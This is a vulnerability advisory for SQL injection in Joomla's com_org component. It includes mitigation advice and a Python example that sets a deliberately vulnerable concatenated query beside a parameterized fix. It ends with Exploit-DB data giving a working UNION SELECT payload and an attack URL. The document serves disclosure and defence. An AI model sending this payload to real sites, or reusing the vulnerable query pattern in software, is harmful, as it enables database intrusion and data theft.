Vendor: com_org
By: kazuya
CVSS: 8.8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: com_org
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla com_org SQL Injection Vulnerability (letter parameter)

This vulnerability allows an attacker to inject arbitrary SQL commands through the 'letter' parameter of the 'com_org' component of Joomla. The parameter value is placed directly into the component's SQL query, so a specially crafted HTTP request whose 'letter' parameter carries SQL syntax is executed as part of that query.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly validated and sanitized before it is used in any SQL query. Additionally, use parameterized queries (prepared statements with bound values) instead of building SQL statements by string concatenation; a bound value is never parsed as SQL, which prevents SQL injection regardless of the input's content.
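The following added example (not code from the advisory, its author, or the Joomla project) shows the pattern the advisory describes beside the hardened form the mitigation calls for. It uses Python with an in-memory SQLite database as a stand-in for Joomla's MySQL backend; the `jos_org` table and its rows are constructed here, and the allow-list check for a single letter is an assumption about what an index-by-letter page needs.

```python
import sqlite3

# Constructed stand-in for the `jos_org` table named in the advisory; the rows
# are made up for this example, not taken from any real Joomla site.
SAMPLE_ORGS = ["Alpha Org", "Beta Org", "A_Tech"]


def make_db():
    """Build an in-memory database with a tiny `jos_org` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE `jos_org` (`id` INTEGER PRIMARY KEY, `name` TEXT)")
    conn.executemany("INSERT INTO `jos_org` (`name`) VALUES (?)",
                     [(n,) for n in SAMPLE_ORGS])
    return conn


def count_vulnerable(conn, letter):
    """The pattern from the advisory: `letter` is spliced into the LIKE literal.

    A value that begins with a quote ends the string early and the remainder
    is executed as SQL, which is exactly what the `')...` payload relies on.
    """
    sql = "SELECT count(*) FROM `jos_org` WHERE (`name` LIKE '" + letter + "%')"
    return conn.execute(sql).fetchone()[0]


def count_parameterized(conn, letter):
    """Hardened form: the value is bound as a parameter and never parsed as SQL.

    Binding alone does not neutralise LIKE metacharacters, so `%`, `_` and the
    escape character itself are escaped before the trailing wildcard is added.
    """
    escaped = (letter.replace("\\", "\\\\")
                     .replace("%", "\\%")
                     .replace("_", "\\_"))
    sql = "SELECT count(*) FROM `jos_org` WHERE (`name` LIKE ? ESCAPE '\\')"
    return conn.execute(sql, (escaped + "%",)).fetchone()[0]


def is_valid_letter(letter):
    """Allow-list check (assumed here): an index-by-letter page needs one letter."""
    return len(letter) == 1 and letter.isalpha()


if __name__ == "__main__":
    conn = make_db()
    # Constructed inputs: a normal letter, a LIKE wildcard, and a quote break-out.
    for value in ["A", "_", "') OR 1=1 -- "]:
        print(repr(value),
              "valid:", is_valid_letter(value),
              "vulnerable:", count_vulnerable(conn, value),
              "parameterized:", count_parameterized(conn, value))
```

With the concatenated query, the wildcard and the quoted value both change which rows are counted; with the bound parameter, every input is matched only as a literal prefix, and the allow-list check rejects anything that is not a single letter before the query is built. In the Joomla component itself the equivalent fix is to pass the value through the database driver's quoting or prepared-statement API rather than concatenating it into the query string.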

Exploit-DB raw data:

# Joomla com_org SQL Injection Vulnerability (letter parameter)
# Author: kazuya
# Mail: kazuy0r@gmail.com Jabber: kazuya@jabber.ccc.de
# Greetz to back2hack

# Vulnerability
# Query: SELECT count(*) FROM `jos_org` WHERE (`name` LIKE '<sql>%' || ...
# SQL: ')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f
# Example: http://[target].com/index.php?option=com_org&letter=')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs